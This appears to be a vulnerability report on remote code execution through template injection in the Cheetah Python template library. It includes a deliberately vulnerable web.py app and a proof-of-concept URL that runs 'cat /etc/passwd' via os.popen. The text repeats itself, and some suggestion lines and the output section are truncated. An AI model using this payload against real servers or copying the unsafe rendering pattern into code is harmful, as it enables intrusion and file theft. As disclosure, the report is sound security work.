🔐 Critical RCE vulnerability: Cheetah Template executes arbitrary code from untrusted input
Summary
Cheetah templates allow execution of arbitrary Python code when rendering templates containing user-supplied input. This behavior can lead to Remote Code Execution (RCE) if developers render untrusted input directly. Specifically, the $ syntax supports evaluating Python expressions, which creates a critical security issue when template content is controlled by external users.
Proof of Concept
# encoding: utf-8
# File: code.py
import web
from Cheetah.Template import Template
urls = (
'/inject/(.*)', 'InjectDemo',
)
app = web.application(urls, globals())
class InjectDemo:
def GET(self, user_input):
try:
t = Template(user_input)
return str(t)
except Exception as e:
return f"<b>Error:</b> {e}"
if __name__ == "__main__":
app.run()
poc:http://127.0.0.1:8080/inject/$__import__('os').popen(%22cat%20/etc/passwd%22).read()
output:
Suggestion:
Provide a safe mode orsandboxed re in Cheeta
Warn explicitly in the documentation that Cheetah.
Affected Version
Confirmed on latest release: Cheetah <=3.4.0
🔐 Critical RCE vulnerability: Cheetah Template executes arbitrary code from untrusted input
Summary
Cheetah templates allow execution of arbitrary Python code when rendering templates containing user-supplied input. This behavior can lead to Remote Code Execution (RCE) if developers render untrusted input directly. Specifically, the
$syntax supports evaluating Python expressions, which creates a critical security issue when template content is controlled by external users.Proof of Concept
poc:http://127.0.0.1:8080/inject/$__import__('os').popen(%22cat%20/etc/passwd%22).read()
output:
Suggestion:
Provide a safe mode orsandboxed re in Cheeta
Warn explicitly in the documentation that Cheetah.
Affected Version
Confirmed on latest release: Cheetah <=3.4.0